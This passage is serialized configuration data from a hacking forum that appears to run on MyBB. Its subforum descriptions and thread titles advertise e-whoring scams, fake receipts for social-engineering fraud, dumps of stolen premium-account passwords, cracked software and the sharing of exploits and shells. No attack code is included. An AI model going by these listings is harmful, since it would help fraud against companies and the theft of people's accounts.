AdSense\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"book.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:17;a:37:{s:3:\"fid\";s:2:\"17\";s:4:\"name\";s:9:\"E-Whoring\";s:11:\"description\";s:78:\"Don\'t know what E-Whoring is? Find out here. **Caution: Adult content warning!\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"16\";s:10:\"parentlist\";s:8:\"10,16,17\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"323\";s:15:\"lastpostsubject\";s:29:\"Camdecoy bitch available here\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"0\";s:14:\"allowvideocode\";s:1:\"0\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:5:\"Rules\";s:5:\"rules\";s:185:\"1. All packs should have at least 2 picture previews.\r\n2. All previews must be censored.\r\n3. No previews directing to other sites.\r\n4. Img & video code has been disabled for this forum.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:24:\"n4d9577fda0944_small.jpg\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:45;a:37:{s:3:\"fid\";s:2:\"45\";s:4:\"name\";s:20:\"SEing Graphical help\";s:11:\"description\";s:27:\"Need a fake receipt or POP?\";s:6:\"linkto\";s:46:\"http://l33thacking.net/forumdisplay.php?fid=44\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"16\";s:10:\"parentlist\";s:8:\"10,16,45\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:16:\"receipt-text.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:23;a:37:{s:3:\"fid\";s:2:\"23\";s:4:\"name\";s:14:\"White Hat Help\";s:11:\"description\";s:83:\"Need to secure your website? Have you infected yourself? This is the right section \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"22\";s:10:\"parentlist\";s:5:\"22,23\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"62\";s:15:\"lastpostsubject\";s:40:\"Think you have an infection? Click Here.\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"borsalino_blanc.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:24;a:37:{s:3:\"fid\";s:2:\"24\";s:4:\"name\";s:27:\"Miscellaneous Computer Talk\";s:11:\"description\";s:52:\"Off topic computer discussions are to be held here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"22\";s:10:\"parentlist\";s:5:\"22,24\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"205\";s:15:\"lastpostsubject\";s:35:\"Windows 8 Officially released 26-10\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:28:\"preferences-system-login.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:25;a:37:{s:3:\"fid\";s:2:\"25\";s:4:\"name\";s:41:\"Computer Protection and Security Breaches\";s:11:\"description\";s:94:\"Find out the latest security alerts and post your topics here related to computer protection. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"22\";s:10:\"parentlist\";s:5:\"22,25\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"8\";s:15:\"lastpostsubject\";s:37:\"[Serials] Malwarebytes Full keys Dump\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"kwikdisk.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:27;a:37:{s:3:\"fid\";s:2:\"27\";s:4:\"name\";s:17:\"Sign up for Elite\";s:11:\"description\";s:88:\"Sign up for Elite Membership here and find out the benefits on upgrading to elite here. \";s:6:\"linkto\";s:34:\"http://l33thacking.com/upgrade.php\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"26\";s:10:\"parentlist\";s:5:\"26,27\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:21:\"user_male_add (1).png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:55;a:37:{s:3:\"fid\";s:2:\"55\";s:4:\"name\";s:17:\"Gay Free Requests\";s:11:\"description\";s:50:\"Need something for free? Post your requests here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"28\";s:10:\"parentlist\";s:8:\"31,28,55\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:23:\"Paypal 1 dollar 50cents\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:6:\"10.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:28;a:37:{s:3:\"fid\";s:2:\"28\";s:4:\"name\";s:21:\"Elite Discussion Area\";s:11:\"description\";s:61:\"For Elite discussions and brags on your new hacks, gifts etc.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,28\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:28:\"New Section Added in VIP tab\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"skull.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:29;a:37:{s:3:\"fid\";s:2:\"29\";s:4:\"name\";s:16:\"Advanced Methods\";s:11:\"description\";s:109:\"Get the exclusive advanced grey hat methods here. This section is for advanced tutorials, guides and ebooks. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,29\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:24:\"Win all paypal disputes!\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:135:\"1. Do not post programs, this is for tutorials, guides and ebooks.\r\n2. Do not post content that is already out in the public area on LH\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"atom.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:54;a:37:{s:3:\"fid\";s:2:\"54\";s:4:\"name\";s:16:\"Premium Accounts\";s:11:\"description\";s:126:\"Find access to all premium accounts such as hostings, porn, etc. All threads here must be post here and/or PM me for download.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,54\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"255\";s:15:\"lastpostsubject\";s:50:\"[4 nov]HUGE MIXXX OF WORKING PASSES FOR 4.NOV.2012\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:125:\"1. Any leechers or password changer on being caught would be permanently banned.\r\n2. No keylog dumps, only premium accounts. \";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:14:\"my-account.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:30;a:37:{s:3:\"fid\";s:2:\"30\";s:4:\"name\";s:17:\"Premium Downloads\";s:11:\"description\";s:168:\"Have a program that you would like to share with premium members only or want to distribute a program here which you don\'t want normal members to have? Post them here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,30\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:31:\"[100% Virus Free] Photoshop CS5\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:11:\"Forum rules\";s:5:\"rules\";s:181:\"1. All downloads must contain a virus scan.\r\n2. Program must not already be distributed in public forums on LH.\r\n3. Download at your own risk!\r\n4. This section is only for programs.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"program_file1_4.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:84;a:37:{s:3:\"fid\";s:2:\"84\";s:4:\"name\";s:23:\"Other Premium Giveaways\";s:11:\"description\";s:120:\"This section for sharing exploits, VPNs, Shells etc. Anything that doesn\'t fall under the sections above belong in here.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,84\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:10:\"800 shells\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"treasure.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:33;a:37:{s:3:\"fid\";s:2:\"33\";s:4:\"name\";s:18:\"Graphics Help Desk\";s:11:\"description\";s:104:\"Need Help in creating an image? Stuck at a tutorial? Post your questions related graphics editing here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,33\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:30:\"Anyone have photoshop cracked?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"premium_support.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:34;a:37:{s:3:\"fid\";s:2:\"34\";s:4:\"name\";s:20:\"Tutorials and Guides\";s:11:\"description\";s:81:\"Post your tutorials and guides on how to use Photoshop, GIMP and other programs. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,34\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"257\";s:15:\"lastpostsubject\";s:30:\"Black Sleek Thread Design .PSD\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"paint.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:63;a:37:{s:3:\"fid\";s:2:\"63\";s:4:\"name\";s:8:\"Requests\";s:11:\"description\";s:60:\"Need a signature, userbar, avatar or logo? Request em here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,63\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:10:\"Need a sig\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:31:\"gnome_applications_graphics.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:44;a:37:{s:3:\"fid\";s:2:\"44\";s:4:\"name\";s:17:\"Receipts and POPs\";s:11:\"description\";s:99:\"Need a fake receipt or proof of purchase to SE your next product/company? Post your requests here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,44\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"257\";s:15:\"lastpostsubject\";s:15:\"FIFA 13 Receipt\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:16:\"receipt-text.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:35;a:37:{s:3:\"fid\";s:2:\"35\";s:4:\"name\";s:16:\"Graphics Lounge \";s:11:\"description\";s:112:\"Show off with your creations, Create contests, ask off topic graphics related questions here (No support here). \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,35\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:10:\"New Avatar\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:15:\